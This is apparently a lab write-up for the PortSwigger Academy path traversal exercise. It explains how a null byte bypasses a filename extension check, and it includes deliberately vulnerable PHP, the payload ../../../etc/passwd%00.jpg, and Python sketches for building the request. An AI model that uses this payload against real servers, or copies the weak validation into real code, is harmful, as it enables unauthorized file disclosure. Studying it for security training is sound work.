🌐 File path traversal, validation of file extension with null byte bypass
Detailed analysis of the lab 'File path traversal, validation of file extension with null byte bypass' from the PortSwigger Academy Path traversal series
This lab contains a path traversal vulnerability in the display of product images. The application validates that the supplied filename ends with the expected file extension. To solve the lab, retrieve the contents of the /etc/passwd file.
🔧 Lab Setup & Files
Files and Environment
Files: None
🔍 Initial Analysis
First Steps
This is the last lab in the Path Traversal series. For background and clarifications, refer to the first one: File path traversal, simple case. In this lab, the vulnerable parameter is still filename, which appears in the src attribute of the <img> tag that loads each product image. The only change is that the application now validates the file extension of the supplied value. Most likely it checks that the filename ends with .jpg, the extension used by the images in the previous labs. If the extension is .jpg, it loads the resource; otherwise, it responds with a Not Found. Let’s move on to the exploitation phase.
🔬 Vulnerability Analysis
Potential Attack Vectors
Path Traversal
🎯 Solution Path
Step-by-Step Guide
Initial setup
Given the title of the lab, the first question is: what is a null byte? A null byte is a byte whose value is zero (0x00). A well-known technique called Null Byte Injection uses it to trigger unexpected behavior in software, and it also applies to web applications, for example in file uploads. Let’s start with the basics! In C/C++, the null byte is the string terminator. A C string is simply an array of char with no stored length, so every string ends with a \0, even if it is not directly visible, and functions that read the string stop at the first \0 they find. Problems arise when a language that can hold a \0 in the middle of a string hands that string to a C API. Suppose we have PHP code like this:
<?php
// Vulnerable example: file inclusion with weak extension validation

// Get the 'filename' parameter from the query string
if (!isset($_GET['filename'])) {
    die("Please supply a filename parameter.");
}
$filename = $_GET['filename'];

// Weak validation: check if the string ends with ".jpg"
if (substr($filename, -4) !== '.jpg') {
    die("Invalid file type.");
}

// Attempt to read the file
if (file_exists($filename)) {
    echo file_get_contents($filename);
} else {
    echo "File not found.";
}
?>
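In this case, a payload like ../../../etc/passwd%00.jpg bypasses the extension check. The server URL-decodes %00 into a null byte, and the check only verifies that the last 4 characters are .jpg, which they are. When the path reaches the underlying C file functions behind file_get_contents(), however, the string terminates at the null byte, so the path actually opened stops at passwd. Note that PHP itself has rejected paths containing null bytes since version 5.3.4, so this example only behaves this way on older versions.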
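To make the mismatch concrete, here is a minimal Python sketch of the two views of the same string. It is only a simulation and not the lab's actual code: the helper names passes_extension_check and path_seen_by_c_api are hypothetical, and ctypes is used simply because its string buffers follow C's null-terminated convention.

```python
import ctypes


def passes_extension_check(filename: str) -> bool:
    """Mimic the weak check: only the last four characters are inspected."""
    return filename[-4:] == ".jpg"


def path_seen_by_c_api(filename: str) -> str:
    """Return the part of the name that a C-style string function would read.

    create_string_buffer() copies the bytes into a C char array, and .value
    reads it as a null-terminated string, stopping at the first 0x00 byte.
    """
    raw = filename.encode("utf-8")
    return ctypes.create_string_buffer(raw).value.decode("utf-8")


# The payload after the server has URL-decoded %00 into a real null byte.
payload = "../../../etc/passwd\x00.jpg"

print(passes_extension_check(payload))  # the check sees the trailing ".jpg"
print(repr(path_seen_by_c_api(payload)))  # the C view ends before the null byte
```

The check and the file access disagree about where the string ends, and that disagreement is the whole bypass.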
Exploitation
So, we just need the dot-dot-slash sequence used in the other labs, followed by %00 and the expected extension to bypass the check: filename=../../../etc/passwd%00.jpg. The complete URL becomes https://0abf0099037a82ee80f6b381000a0014.web-security-academy.net/image?filename=../../../etc/passwd%00.jpg, and requesting it returns the passwd file:
Passwd
Solution Confirmation
Lab Solution
🛠️ Exploitation Process
Technical Approach
The automatic exploit makes a simple GET request with the parameter filename=../../../etc/passwd\x00.jpg. Why \x00 and not %00? As we discussed in previous labs, requests URL-encodes parameter values, so a literal %00 wouldn’t work: the % would be encoded as %25, turning the sequence into %2500. In a Python string, \x00 is the escape sequence for the byte value 0x00, so the string contains an actual null byte. When URL encoding is performed, that byte is converted to %00, and the server correctly returns the /etc/passwd file.
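The difference between the two spellings can be checked without sending any request. The sketch below uses urlencode from the standard library as a stand-in for the encoding applied to query parameters; we assume the exploit passes the value as a parameter rather than pasting it into the URL by hand. LAB_URL is a placeholder and build_url is a hypothetical helper, neither comes from the original exploit.

```python
from urllib.parse import urlencode

# Placeholder: replace with the URL of your own lab instance.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/image"


def build_url(filename: str, base: str = LAB_URL) -> str:
    """Build the request URL, percent-encoding the filename parameter."""
    return f"{base}?{urlencode({'filename': filename})}"


# A literal "%00" in the string: the percent sign itself gets encoded.
literal_percent = build_url("../../../etc/passwd%00.jpg")

# A real null byte in the string: it is encoded as %00, which is what we want.
real_null_byte = build_url("../../../etc/passwd\x00.jpg")

print(literal_percent)
print(real_null_byte)
```

The slashes are percent-encoded as well, which is harmless because the server decodes the whole parameter value before using it.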